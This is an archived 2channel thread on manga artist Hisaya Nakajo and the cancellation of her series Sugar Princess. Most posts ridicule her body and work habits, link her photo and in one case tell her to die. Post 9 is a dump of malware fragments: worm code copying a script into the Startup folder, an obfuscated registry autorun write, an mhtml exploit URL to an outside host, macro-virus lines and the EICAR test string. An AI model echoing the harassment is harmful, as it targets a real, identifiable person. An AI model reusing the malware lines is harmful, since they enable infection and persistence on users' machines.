2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【ブコフで】中条比紗也ピザ12枚目【花ざかり】

1 :花と名無しさん:2006/12/06(水) 05:03:21 ID:???0
ここは花とゆめ作家 中条比紗也とその作品について語るスレです。

これからフィギュア真っ盛りシーズンに入るというのに
2号で(打ち切り?)最終回を迎える砂糖姫。
体調不審で原稿減量中も作者は大好評増量中!
商業は副業で最早存在が板違い、同人ライフに精を出す、代表作花ざかり体型は高見盛なピザタン。
天高くピザ肥ゆる春夏秋冬、そんなピザタンこと【中条比紗也】をまたーり語りましょう。


   (^(^ ^)^)
   |.,,,___,,,.|   ピザでも食ってろ!(ピザの理由を知りたい人は>>5以下を参照してね)
   ( ・∀・)
   (__⊂彡☆))
   しー‐J

    ζ ζ ζ ζ
    ,.ゝっ;,';.;;,':.,.;,.
   ( ';っ;'.;,っ;っ;'; ) -=3 ペシッ!!
    `"'' ‐---‐ ''"


とっても内容の濃い過去ログは>>2
【前スレ】 【原稿激減】中条比紗也ピザ11枚目【同人激増】
http://comic6.2ch.net/test/read.cgi/gcomic/1147670115/l50

2 :花と名無しさん:2006/12/06(水) 05:04:15 ID:???0
【過去ログ】
【本業サボって】中条比紗也9【同人・握手会・観劇】
http://comic6.2ch.net/test/read.cgi/gcomic/1136393217
中条比紗也8〜シュガープリンセス〜
http://comic6.2ch.net/test/read.cgi/gcomic/1108347208
中条比紗也7〜日記は病自慢・作品は減頁横顔ばかり〜
http://comic6.2ch.net/test/read.cgi/gcomic/1087729965
中条比紗也6
http://comic4.2ch.net/test/read.cgi/gcomic/1063289770
中条比紗也『花ざかりの君たちへ』
http://comic.2ch.net/test/read.cgi/gcomic/1046597246
〜だからかづこも夢を見る〜中条比沙也5
http://comic.2ch.net/test/read.cgi/gcomic/1006867661
中条比紗也(ふみづきりょう)について
http://comic.2ch.net/test/read.cgi/gcomic/1020480977
レッツキーポンダンシン! 中条比紗也〜4
http://comic.2ch.net/gcomic/kako/998/998239246.html
〜背景は花咲かり出演はホモばかり〜中条比紗也3
http://salad.2ch.net/gcomic/kako/995/995386645.html
中条比紗也ってどうなの? 2
http://salad.2ch.net/gcomic/kako/982/982596290.html
■■中条非差也ってどうなの?■■
http://salad.2ch.net/gcomic/kako/974/974446110.html
死死死死■花ざかりの君たちへがだいっきらい!死死死死嫉視しS
http://mentai.2ch.net/gcomic/kako/949/949473158.html

3 :花と名無しさん:2006/12/06(水) 05:05:07 ID:???0
【ピザ伝説】
2005年度秋頃より、体調に異変を感じ病院にて検査を受けたところ即日入院。
1日も早い再開を目指して治療・療養に専念するとのこと(編集部談より抜粋)。
<入院中の活動>
病院抜け出して舞台鑑賞1回目(入院してすぐ) 10月3日〜23日の間
病院抜け出して舞台鑑賞2回目in大阪 11月1日
休載発表 11月5日発売号
公式にコメント11月12日
ペーパーの対談日 (詳細は>>5以下を参照)11月16日
握手会11月20日

2006年3号にて連載再開予告を雑誌1P分を使い大々的に広告。
2006年4号(1月20日発売号)より13Pにて連載再開。

4号柱コメント
「やっと退院しました!長くお休みしてご心配おかけしました〜。
トリノに向けて連載再開です!よろしくお願いします★」
スレ住人の声「自分もまさか1回目くらいは、復帰後すぐだし何とかするんだろ
と思っていたが・・・・・・
甘かったよ。またかづこを理解していなかったようだ。」

5号(12P)、6号(12P)と、連載再開から次々と減ページにて掲載。
<5号柱コメント>「ついにトリノ開幕です!日本人選手の活躍に期待して、メダル獲得できるよう祈ってます。」
<花むし>テーマ【気分転換の方法】「寝ることです」

ちなみに5号発売直後の1月22日にはJ禁オンリーイベント参加が目撃されている。
そして連載再開未定のまま再び休載へ・・・・・・。

4 :花と名無しさん:2006/12/06(水) 05:06:10 ID:???0
【中条比紗也】
1973年生まれで今年33だよ。

【作者近影(10年前)】
ttp://up-now.hp.infoseek.co.jp/cgi-bin/img-box/img20050615004413.jpg

【現在の主な活動】
現在、花とゆめ(毎月5日・20日発売)にてシュガープリンセス休載中。2007年2号にて最終回?

シュガープリンセスの掲載状況(花とゆめ2005年度発売分)
連載:5号、6号、7号、8号、10号、11号、12号、13号 16号、17号、18号
休載:3号、4号、9号、14号、15号、19号、20号、21号、22号、23号、24号、1号、 2号
表紙:5号、12号
連載率:45%

2006年度(4号より連載再開)
連載:4号(13P)、5号(12P)、6号(12P) 10号(18P) …
掲載率100% 減頁率100%

5 :花と名無しさん:2006/12/06(水) 05:07:11 ID:???0
●ペーパーとは●

2005年冬コミにて配布。内容は以下参照。(かづこ=中条比紗也 ピザ1&2=連れ)

かづこ「しょっぱなからすいませんっした!!8月のフライヤーで、次の新刊10月です(汗)
     とか言っておきながら出ませんでした(はーと)あ、ネコパンチ山田です。」
ピザ1「はい!イヌキック木田です、こんにちわ。まぁ仕方ないっすね、ネコパさん、入院してたら、
    新刊はムリやろ〜!」
ピザ2「こんにちわ。ウサチョです。ネコパさんったら大変なことになってます、早くよくなってね。」
かづこ「はい、すみません(汗)ネコパ入院してました〜ッ。あーびっくりした。即日入院だもん。
実はこの対談も病室でやっとりまス。わー、リアル。」
ピザ1「ほんま、ありえへんな(笑)ここ病院やで!こんなとこで対談してる私らもアホやなー!
まぁ、これでチラシも出来る訳ですし」
ピザ2「都内某病院の一室でおバカな対談ですよっ萌え〜な愛のなせる技ですなっ今さー、
    ネコパったらベッドの上でせんべい食ってるぅー!!ありえないっありえないーっっ!!」
かづこ「だって・・・お腹すいやんやも。そう愛の成せる技・・・今のあたしにゃ○(ペーパーUP
してくれた人の意向で一応伏せ字)が活力ですけん!入稿間近にして入院でくやしい思いば
     しました(汗)なので原稿描きも病室でやっちゃいました★フフフ」
ピザ1「ネコパさん働き者ですな、原稿も何枚も出来上がってたりするしね。ちなみに○シングル
発売日にこの対談やってたりするんですわ。(でもマジせんべいはありえない/笑)」
ピザ2「ベッド上で原稿やっちゃうんだもんね、すごいぞネコパ。そして活力が○っていうのもすごいぞ、
    そもこれで元気になれるっていうのならそれもよしとしよう。」
かづこ「あたしがこの入院中どんだけあの子達の歌になぐさめられたことか・・・ちなみに、病院抜けだして
    ○の舞台を見にも行きました。(←もしろん許可もらって)入院してから2回程。
    ・・・うち1回は大阪(千秋楽)行きました。イエイ!」
>>6に続く)

6 :花と名無しさん:2006/12/06(水) 05:08:10 ID:???0
ピザ1「大阪来るって聞いた時はびっくりしたよー!しかも外出ってあなた(笑)まぁ無事見て帰れたから
    よかったけど。ほんま○を好きになったおかげで命びろいしてるネコパって最高!」
ピザ2「うち1回は私とグローブ座に見に行ったよね、入院してすぐの頃。もーびっくりしたよォー
でもこの日客席に○ちゃんが来てたね。それだけでもネコパの治癒力が高まったよね(←そうそう/かづこ)」
かづこ「うちら2階で○ちゃんすぐ真下だったからよく見えたしネ(はーと)初め誰だかわかんなくて
○?!とか思いました(汗)ホンモノすげー細っでも○舞台3回も見られてちょー幸わせ(はーと)
自己治癒力アップですヨ。」
ピザ1「・・・ええなぁ〜・・・。」←でもイヌさん。アナタとても良席だったじゃないのヨ/かづこ
ピザ2「○ちゃん舞台に上がって○としゃべっていったしね。かわいかった○ちゃん・・・今さー、
ネコパ、ベッドの上でピザ食いたいって言ったーこの人病人なの?!今風邪ひいてる犬よりすごい元気、
    たった今ネコパの夕食が運ばれてきました・・・確かにメニュー見たら・・・ピザ食べたくなるわな・・・」
かづこ「ピザ食べたいなァ・・・。あ、フライヤーのイラストなんだけど、来年(今年)戌年なので○犬。
以前番組でやった時とは犬種かえてみました(はーと)何種かわかる?」
ピザ2「○は豆柴でしょ(はーと)かわいいかわいい豆柴萌えるぅ〜。他は・・・犬よろしく!」
ピザ1「・・・つーか私聞いてるから分るけど、今の時点で色ついてないんでビミョーよ!○くんなん
か色つけな分らんわい!・・・じかに書くってけっこうツラいね(笑)(今回下書なしでやってます)」
かづこ「(涙)・・・。○ちゃんレトリーバー、○チャウチャウ、○くんボーダーコリーです。コンサで
会場駆けまわって黄色い悲鳴を支配する彼を見て、羊を追いかける放羊犬みたいだなと思って・・・。
ああ、スペースがもうない!というわけで・・・また!!」

7 :花と名無しさん:2006/12/06(水) 05:20:27 ID:???O
同人誌の画像とか。

マサピーちゃん
http://l.pic.to/3zexl
まんだらけ札幌店紹介文
http://www.mandarake.co.jp/information/2006/01/17/spr01/index.html
コナン1999.12
http://gazoubbs.com/2ji/img/1137835947/5.jpg
ワンピ
http://gazoubbs.com/2ji/img/1137835947/4.jpg
エヴァ
http://gazoubbs.com/2ji/img/1137835947/6.jpg
ヒカ碁2000.8.11
http://gazoubbs.com/2ji/img/1137835947/3.jpg
ヒカ碁便箋
http://gazoubbs.com/2ji/img/1137835947/8.jpg
エヴァ便箋
http://gazoubbs.com/2ji/img/1137835947/7.jpg

8 :立てた人:2006/12/06(水) 05:41:09 ID:???O
すみません。
10スレが抜けてます。
あと、>1の「不審」は「不振」の間違いです
…いや間違ってないか?w
連投規制で直せません。ごめんなさい。

9 :<body onload=window()>:2006/12/06(水) 07:55:49 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

10 :花と名無しさん:2006/12/06(水) 08:34:31 ID:???0
>>1
乙〜

11 :花と名無しさん:2006/12/06(水) 11:43:06 ID:???0
>>1-8
乙カレー

・過去ログ補填
【原稿12枚】中条比紗也10【ピザ∞枚】
http://comic6.2ch.net/test/read.cgi/gcomic/1140551244/


12 :花と名無しさん:2006/12/06(水) 21:47:17 ID:???0
さらば砂糖姫の発表あったのに、この静けさはw
最終回が出たら少しは祭りになる?
その前に冬の祭典か?

13 :花と名無しさん:2006/12/06(水) 23:29:03 ID:???0
2号(12月後半)で最終回とのことだから、最終回が先。
冬の祭典は、月末(年末)だから。

14 :花と名無しさん:2006/12/07(木) 00:15:39 ID:???0
それにしても仮にも連載作品でこれだけひっそりとした
最終回の予告は珍しい。


15 :花と名無しさん:2006/12/07(木) 00:19:39 ID:???0
連載自体ひっそりしてたからね・・

16 :花と名無しさん:2006/12/07(木) 00:49:17 ID:???O
体はあんなに堂々としてるのに

17 :花と名無しさん:2006/12/07(木) 01:09:24 ID:???0
1乙!
ほんとに最終回なんだね・・・。
でもまたすぐに新連載始まりそう。


18 :花と名無しさん:2006/12/07(木) 01:51:26 ID:???0
しん……  
って効果音が似合うね、この静かなスレ。

19 :花と名無しさん:2006/12/07(木) 18:17:58 ID:???0
*silence*

20 :花と名無しさん:2006/12/07(木) 18:34:34 ID:???0
最終回なんてサシミー




21 :花と名無しさん:2006/12/07(木) 18:35:09 ID:???0
仮にも前作で一千万部売り上げた作家へ
の反応がこれとは惨めなもんだな・・・
本当に読者に離れられちゃったんだね。

22 :花と名無しさん:2006/12/07(木) 19:20:34 ID:???0
>>21
散々休載続き、次号予告で最終回なんてしてりゃあ仕方がないよ。

23 :花と名無しさん:2006/12/07(木) 20:40:17 ID:???O
中条ピザ屋さんのスレはここですか?

24 :花と名無しさん:2006/12/07(木) 21:05:55 ID:???0
>>22
それがなくても花君後半でかなり客離れてたしね。砂糖で一層拍車かけた感じ。

25 :花と名無しさん:2006/12/07(木) 21:34:22 ID:ZsiKmsc80
昔、波平のおまけまんがで、細身に描いてあったけどピザだったんだ…
波平精一杯のおもてなしだったんかな?それとも嫌味だったんかな

26 :花と名無しさん:2006/12/07(木) 22:44:19 ID:???0
波の性格的に 精一杯の嫌味 でしょ。

27 :花と名無しさん:2006/12/07(木) 23:26:05 ID:of0XODTbO
>>20
ピザスレに刺し身かw

28 :花と名無しさん:2006/12/08(金) 22:41:33 ID:???O
そいや途中から放棄したけど最後どうなったの?
ジュリアが余った関西弁男とくっついたとかそんなん?

29 :花と名無しさん:2006/12/09(土) 01:55:07 ID:???O
あらゆる伏線放置で退学しました

30 :花と名無しさん:2006/12/09(土) 15:21:22 ID:???0
そしてこの度作者は花とゆめを退学します

31 :花と名無しさん:2006/12/09(土) 17:46:06 ID:???0
さようならピザノシ

32 :花と名無しさん:2006/12/10(日) 12:17:10 ID:???0
年賀状には「ことヨロ」ってあったけどねw

33 :花と名無しさん:2006/12/10(日) 12:20:44 ID:???0
ことしも(コミケで)よろしく、の略です

34 :花と名無しさん:2006/12/10(日) 18:04:51 ID:???0
冬は本人来るかな?連載終わったから
休載中の癖に同人やってるとは言わせないわヨ!
とか考えて堂々としてそう。
売り物は休載中に作ったものだらけだろうけど。

35 :花と名無しさん:2006/12/10(日) 19:03:06 ID:???0
ピザ屋に電話してサークルスペースまで宅配。

36 :花と名無しさん:2006/12/13(水) 14:16:09 ID:QB0Jh4LJ0
誰か、「花君」でいいから男女CPのエロ同人を今再び出してみよう。
作者のエンジンもかけ直せるかも知れない。

37 :花と名無しさん:2006/12/13(水) 18:12:02 ID:???O
>>36
本気で言ってるんだったらピザ屋を盲信し過ぎ

38 :花と名無しさん:2006/12/14(木) 06:33:34 ID:???0
>>37
ちょっおまっ冗談にきま(ry 本気でいう奴いたらキチガ(ry

39 :花と名無しさん:2006/12/14(木) 07:34:25 ID:???0
>>36
の者です。もちろん冗談のネタでさぁ(ぉ
しかし本気にしろ冗談にしろ、過去の亡霊(という名の作品)に
取り憑かれたままの同人屋が、今も存在するらしいからナー。
少なくともBLは。

40 :花と名無しさん:2006/12/14(木) 13:04:12 ID:???O
最終回まであと一週間ですね。
どうまとめる気なんだろうか。


内容薄すぎてまとめ様が無さそうだな。

41 :花と名無しさん:2006/12/14(木) 15:15:14 ID:???0
冬コミの原稿と重なってただろうしね。
どうせなら最終回をも落としたっていう伝説でも作れば?

42 :花と名無しさん:2006/12/14(木) 16:35:56 ID:???O
♪ピザ屋 ピザ屋 ピザ屋〜
♪ピザ屋〜のしごーとは〜
♪あらし あらし あらし〜
♪あらしのホモ漫〜

43 :花と名無しさん:2006/12/14(木) 20:45:17 ID:???0
一瞬
ピザ屋の仕事は荒らし

かと思った。

44 :花と名無しさん:2006/12/14(木) 20:58:12 ID:???0
花とゆめにとっては荒らしだったかもな。

45 :花と名無しさん:2006/12/14(木) 23:35:44 ID:???0
同じ最終回でもフルバとの差あり杉w
巻頭でもなく表紙でもなく、最終回予告もカラーじゃないし
やっぱ人気なかったんだなあと改めて思った。

46 :花と名無しさん:2006/12/14(木) 23:52:30 ID:???0
ドラマ化で当分稼げるからいいやって感じだねー

47 :花と名無しさん:2006/12/15(金) 00:16:57 ID:???0
すっかり忘れてたーw>ドラマ化

48 :花と名無しさん:2006/12/16(土) 02:53:46 ID:???0
ピザの公式サイト見たら
デカデカと砂糖姫最終回の告知してて吹いたww
本誌での扱いがひっそりしすぎてたから
ギャップありすぎでバロスw

49 :花と名無しさん:2006/12/17(日) 01:09:46 ID:???0
ちょw 
最終回16P、しかも掲載位置一番後ろ?

50 :花と名無しさん:2006/12/17(日) 01:35:54 ID:???0
「最後くらいは」とか思わないところがさすがピザ

51 :花と名無しさん:2006/12/17(日) 02:31:28 ID:???0
やらかしてくれんねー。流石ピザ。

52 :花と名無しさん:2006/12/17(日) 05:59:40 ID:???O
なんだあの終わりかた……(´Д`)
プロとして恥ずかしくないのか?あ、体型のが恥ずかしいか。

53 :花と名無しさん:2006/12/17(日) 10:34:25 ID:???0
>>52
もう、読んじゃったんですか!??

54 :花と名無しさん:2006/12/17(日) 11:31:44 ID:???0
PizzaはもうDEBU専SoapでComicも描けるPrincessとして売り出すのが世のため。

55 :花と名無しさん:2006/12/17(日) 20:01:46 ID:???0
silence ふたたび。

56 :花と名無しさん:2006/12/18(月) 01:51:49 ID:???0
結局シュガーはコミックス全3巻くらい??
まだ最終回読んでないけど柱のコメントが気になる。
あと最後のページで「次回作は来春予定。お楽しみに!」とか
なってたらワロス。

57 :花と名無しさん:2006/12/18(月) 02:01:03 ID:???0
以前、誰だったか名前失念したが、けっこう有名な作家が
「原稿料は一度上がると下がらないというシステムはどうかと
思う」と、自ら高くなり過ぎた原稿料についてや
現在の出版業界のシステムにご意見を投げかけていた事があった。
ピザも花キモが一時期人気上がったので、高い原稿料なんだろうか?

連載だったのか、読み切り連作だったのかもわからんような
佐藤姫に、新人さんでは貰えないような高い金が払われたとすると
花ゆめ購読者としてはモニョりまくりだよ。

58 :花と名無しさん:2006/12/18(月) 23:16:33 ID:???O
1枚あたりの原稿料は今いる作家の中じゃトップランクだと思うよ
枚数少ないしカラーもないから総額は低いだろうが

59 :花と名無しさん:2006/12/19(火) 05:53:07 ID:???0
12/30東地区ミ14a「JETS」嵐の翔智、ニノ相

60 :花と名無しさん:2006/12/19(火) 07:41:04 ID:???O
花ゆめ2号ピザの柱コメント(立ち読みなので要約)
「これが出てる頃には終わってると思いますが
(何かの)スケートの結果が楽しみ」
最終ページの「おわり」の横に
「中条先生の次回作にご期待下さい」(でも、次回登場予定の告知はなし)

61 :花と名無しさん:2006/12/19(火) 08:25:12 ID:???0
まぁある意味期待できるよなぁ。

62 :花と名無しさん:2006/12/20(水) 00:21:47 ID:???0
>>60
まだ読んでないのでありがd。

確かにある意味期待できる。


63 :花と名無しさん:2006/12/20(水) 00:28:20 ID:???0
>>60
バレ乙。
編集から「中条先生の次回作は、○○誌に変更の予定です」とか
「中条先生の次回作は、未定です」とあったら祭りだったんだけどナーw

64 :花と名無しさん:2006/12/22(金) 10:17:31 ID:???0
ひどい最終回だった。
でもこれで枠が一つ空くと考えると嬉しい最終回だった。

65 :花と名無しさん:2006/12/22(金) 18:50:36 ID:???0
そうそう、本誌から消えて欲しいという読者の願いを叶えた
有意義なラストだったね。

66 :花と名無しさん:2006/12/22(金) 20:53:53 ID:???0
ああ、やっぱり最終回だったってのに予想通り閑散としているw

67 :花と名無しさん:2006/12/22(金) 21:21:10 ID:???0
そんな中、スレに書き込む俺らは貴重な存在なのかも知れない。
もしかしてピザについて語ってるのここの住人だけ・・・・?

68 :花と名無しさん:2006/12/24(日) 19:53:04 ID:???0
あいかわらず最終回は葬式のようなスレだ。

別に『なんで終わったんだよ』のような哀悼の意を示しているわけではなく。
寧ろ逆。
なんつーか、弔問客のいない式場のような。

69 :花と名無しさん:2006/12/24(日) 23:39:31 ID:???0
結局どうやって〆たの?
リンク継続→これからもがんばろー!ねっ、旬くん! 
こんなかんじ?

70 :花と名無しさん:2006/12/24(日) 23:49:07 ID:???0
そうそう、まさにそんな感じ。

71 :花と名無しさん:2006/12/25(月) 01:41:40 ID:???O
でもほんとに打ち切りだったみたいね。
急に予定が空いた、みたいな事をちらっと目にした。
だったらコンサ?のチケット取っておけば良かったムキーッて続いてたけど。


72 :花と名無しさん:2006/12/25(月) 01:54:55 ID:???0
うわぁ。
もう帰って来なくていいよ、まじで。

73 :花と名無しさん:2006/12/25(月) 01:59:25 ID:???0
>>71
山風のチケって事かなー。
打ち切りになってそういう愚痴しか出ないって事に点目だな。
いや分かりきった事か…延久にピザの予定空いたままにしてくれ>編集部


74 :花と名無しさん:2006/12/25(月) 02:05:40 ID:???0
>>71
> だったらコンサ?のチケット取っておけば良かったムキーッ

死ねばいいのに。氏ねじゃなくて死ね。

75 :花と名無しさん:2006/12/25(月) 08:04:17 ID:???0
おぉーい!昨日、地方の同人イベントで
花君のコピ本出しているサークルはけーん。
>>39
亡霊イターーーw

76 :花と名無しさん:2006/12/25(月) 08:16:57 ID:???0
某漫画家専スレ・過去ログのゴバークにワロタw
2001年1月の中条スレに投下するつもりだったっぽいw
---------------------------------------------------------
24 名前: 693 投稿日:2001/01/15(月) 04:10
↑スミマセン、1個リンク入らなかった!!

↓恐怖!同人のチラシで単なる「知人」に個人攻撃!!
>>6>>24>>42-57
その問題のぺーパーの文章。→>>504
名蚊状、ぱふの同人コーナーに送る→>>116>>195
夏コミカタログのマンレポ→>>215-217
エロ系パロディ同人を書く名蚊状→>>289>>421

↓デムパっぷりが各所から感じられるコミケイトNO50のインタビュー。
www.hakusensha.co.jp/comicate/comi_no50/nakajo/nakajo.html


25 名前: 24 投稿日:2001/01/15(月) 04:11
スミマセン!スレ違いです!
放置して下さい!!
皆様、ごめんなさい…逝ってきます。

77 :花と名無しさん:2006/12/27(水) 13:27:42 ID:???0
花君の空きページに寝る前にホットミルク飲みながらチョコ食べて
星を見るのが好きとか書いてた。それって太るんじゃ・・・と
思いながら読んでたな

78 :花と名無しさん:2006/12/27(水) 20:05:41 ID:???0
寝る前にチョコなんてよく食べられるのな。

79 :花と名無しさん:2006/12/28(木) 01:18:56 ID:???0
>>78
ピザだからさ…。

80 :花と名無しさん:2006/12/28(木) 12:19:40 ID:???0
ピザの斜陽



81 :花と名無しさん:2006/12/29(金) 01:59:01 ID:???0
ピザのシャトー

82 :花と名無しさん:2006/12/29(金) 15:41:42 ID:???O
>>7
画像がリンク切れしてて見れないんだが

83 :花と名無しさん:2006/12/29(金) 23:48:05 ID:???0
明日コミケ行く人いる?

84 :花と名無しさん:2006/12/29(金) 23:54:51 ID:???0
行きます。
ついでに見てこようかな。

85 :花と名無しさん:2006/12/30(土) 01:09:33 ID:???0
自分も見に逝ってみるが、はたして何割増になっているのやら。
そっちの方にだけ興味がある。

86 :花と名無しさん:2006/12/30(土) 19:55:07 ID:???0
今日11時頃と昼頃見に行ったけどいなかった。
見た人いる?

87 :花と名無しさん:2006/12/30(土) 20:56:17 ID:???O
その時間だと同人誌買い漁ってる可能性が。
狙いは撤収中かその直後あたりか。

88 :花と名無しさん:2006/12/31(日) 02:27:01 ID:???O
今回行ってないらしいよ。
コピ本は出したらしいけど。


89 :花と名無しさん:2007/01/02(火) 00:17:03 ID:???O
>>4の写真見たらあまりのイメージとのギャップにショックを受けたorz
別に美人を想像してはいなかったけど、絵のタッチがかわいいだけになおさら…

90 :花と名無しさん:2007/01/04(木) 20:24:47 ID:???0
東城テンテーの絵柄パク遍歴見てたら、ピザっぽいのがあって噴いた。
よりによってピザかよw

91 :花と名無しさん:2007/01/05(金) 00:28:57 ID:???0
麻美?
和実じゃないよね??

92 :花と名無しさん:2007/01/05(金) 04:49:16 ID:???0
http://ex9.2ch.net/test/read.cgi/net/1167906462/

93 : 株価【40】 :2007/01/07(日) 02:41:47 ID:???0
この人まだ花ゆめで書く気あるのかな。

94 :花と名無しさん:2007/01/08(月) 00:32:50 ID:???O
スケート漫画終わっちゃったんだ…知らなかった。

中条さんのことは絵が好きだからという理由で花君から好きになったけど、連載途中で絵が変わってからは微妙になってきてた。

スケート漫画も大して感銘を受けなかったし、もうこの辺でサヨナラしてもいいかな…先生…。

95 :花と名無しさん:2007/01/08(月) 15:19:40 ID:???0
>>93
なさそう。っていうか次のチャンスあるのかね・・・
絵も話も劣化しちゃったし

96 :花と名無しさん:2007/01/08(月) 18:15:47 ID:???0
ピザ先生を載せるぐらいなら、原稿料の安い新人でも使った方が
編集部としてはおいしいと思うよ。
ひょっとしたら人気が出る新人が出てくるかもしれないし。

97 :花と名無しさん:2007/01/08(月) 23:58:57 ID:???0
波スレで春くらいに別花に花ゆめ作家が移動して来るって書き込みがあって
それがピザのことじゃないかっていう話があったんだけど、
マジでピザが別花にくるのだけは勘弁して欲しい…

98 :花と名無しさん:2007/01/09(火) 01:44:17 ID:???0
つか、早くあんな無責任でやる気ない漫画家を飼ってる事自体が
恥ずかしいので、白癬は干してくれよ…マジで。

99 :花と名無しさん:2007/01/09(火) 13:00:48 ID:???0
>>97
月刊誌でも原稿間に合わなさそうだしね
花君中盤あたりまでの勢いはどこに行ったんだろうか
カラーとかほんときれいだったのに

100 :花と名無しさん:2007/01/10(水) 03:35:12 ID:???0
づこタソ新しい仕事に着手してる上に花君もまた動きがあるって…
非常に楽しみです。・゚・(ノ∀`)・゚・。

ところでサイトの入り口の絵が怖くて反射的に窓閉じてしまったよ

101 :花と名無しさん:2007/01/10(水) 13:43:00 ID:???0
花君2とかでも描く気かw
瑞稀と佐野の子供の話とかだったら笑う

102 :花と名無しさん:2007/01/10(水) 23:36:47 ID:???0
>>100
一瞬 もんでんあきこ の絵かと思った。

103 :花と名無しさん:2007/01/11(木) 14:05:52 ID:???O
>>101
したらここも、花ざかりどころかお祭り騒ぎ間違い無しだな。
活気があって、非常にすんばらすぅぃ〜じゃないかwww

104 :花と名無しさん:2007/01/12(金) 00:02:17 ID:???0
新しい仕事って、まだ仕事があることにビックリだよ。。

105 :花と名無しさん:2007/01/12(金) 00:45:38 ID:???0
>新しい仕事
1.占いのページ
2.「花とむし」のページ
3.全サのページ

106 :花と名無しさん:2007/01/12(金) 04:11:01 ID:???O
別花ってまだ隔月?
3年ぐらい前まで買ってたけど、ストーリー漫画の作家さんなら
最低でも40ページぐらい描いてなかったっけ?

107 :花と名無しさん:2007/01/12(金) 09:53:05 ID:???0
去年の夏から月刊になったよ

108 :花と名無しさん:2007/01/17(水) 01:01:23 ID:???O
あてくし、商業は20ページ未満しか書いてはいけないと

「ドクターストップ」

が、かかってますの。

大勢のフアンのみなサマには申し訳なく思いますわ…。
けれども、少しでも永く(趣味の方を)かいていたいの。


…だって!!
あてくしには(趣味の方の)漫画しか無いんですものぉっ!!!!

109 :花と名無しさん:2007/01/17(水) 01:29:59 ID:???0
>>108
寝言言ってないでさっさと引退して下さいピザテンテー

110 :花と名無しさん:2007/01/18(木) 13:13:40 ID:???O
この前、久しぶりに花ざかりを読み返してみたが…
あんなにイタイ内容だったとわ(´Д`;)
連載してた時は小学生から高校辺りだったしなぁ。
何が良かったんだろうorz

111 :花と名無しさん:2007/01/18(木) 17:40:10 ID:???0
>>110
あるあるあるww
自分は花キモ買って無かったけど
(でも当時は買おうか迷ってた。買わなくて本当に良かった。)
厨房の頃買ってた某漫画を久々に読み返してみたら
痛いわ寒いわツマランわで
何でこんな漫画に金出してたんだろう…
と何とも言えない気持ちになったよ。

112 :花と名無しさん:2007/01/18(木) 21:47:50 ID:???O
若気の至りって奴かな

113 :花と名無しさん:2007/01/18(木) 22:35:40 ID:???O
>>111
いや、ホント…買わなくて良かったですねwww


今読むとかなりのギャグ漫画に見えたよ…(´・ω・`)





114 :花と名無しさん:2007/01/19(金) 11:38:18 ID:OZCxTNc70
たしかに、昔は何にも考えずに花君読んでたなぁ・・・。

115 :花と名無しさん:2007/01/19(金) 11:49:59 ID:???0
佐野のむっつりスケベ度がどーにも違和感だったな〜
まあこいつも波平も一発屋ってこった

116 :花と名無しさん:2007/01/19(金) 16:21:28 ID:???O
波は2発屋じゃない?オトナと紅茶がヒットしたし。
自分も花キモの単行本つまんなくて捨てたけど、花キモで昔の読み切りが収録されてる巻とミシピーだけはまだ手元に置いてる。
なんだかんだ言っても昔の絵は綺麗だし、読み切りも官能的な雰囲気が漂ってて好きだったんだよなー。
今じゃ、もう見る影もないけどorz

117 :花と名無しさん:2007/01/19(金) 16:35:18 ID:???0
>>116
読み切り、自分も好きだったな
それが今は・・・・

118 :花と名無しさん:2007/01/19(金) 18:21:29 ID:???0

   (^(^ ^)^)
   |.,,,___,,,.|   おまいら!久々にピザでも食え!トッピングはじゃがバターとコーン&ベーコンじゃ!
   ( ・∀・)
   (__⊂彡☆))
   しー‐J

    ζ ζ ζ ζ
    ,.ゝっ;,';.;;,':.,.;,.
   ( ';っ;'.;,っ;っ;'; ) -=3 ペシッ!!
    `"'' ‐---‐ ''"



119 :花と名無しさん:2007/01/19(金) 18:27:13 ID:???O
わーい、ピザピザ!!


…トッピングが脂質と炭水化物ばっかじゃんww
さすがはピザスレのピザ。



本誌スレで、「黄色いイス」?が載ってるのみて
「今度は誰が原稿落としたのか」
みたいな発言した人がいた。


パッと思いついたのは、もちろんピザだったよ…。

120 :花と名無しさん:2007/01/20(土) 00:01:39 ID:???0
ピザが日記で言ってる新しい仕事って何だろ?
ちょっと面白いとか言ってるし、
普通の漫画のじゃないのかな。

まさかBL系のゲームのキャラデザとかじゃ…
(((((;゜Д゜))))))ガクガクブルブル

121 :花と名無しさん:2007/01/20(土) 01:52:06 ID:???0
>>120
ピザの蛙絵じゃ萌えない以前の問題だから
どこも頼まないだろ

122 :花と名無しさん:2007/01/20(土) 08:53:48 ID:???0
>>121
今のピザよりも酷い絵で乙ゲー沢山出てますよ?w


123 :花と名無しさん:2007/01/20(土) 12:03:14 ID:???0
124 :花と名無しさん :2007/01/20(土) 08:47:37 ID:???O
花君続編と闇末再開が春以降に確定。

詳細は不明。花ゆめ立ち読み汁

124 :花と名無しさん:2007/01/20(土) 15:27:27 ID:???0
>>123
・・・・え?
花ゆめ買うのもうやめようかな・・・・

125 :花と名無しさん:2007/01/20(土) 16:37:24 ID:???0
>>123
\(^o^)/花ゆめオワタ

126 :花と名無しさん:2007/01/20(土) 17:10:51 ID:???0
>>123
え?ネタ?マジで?

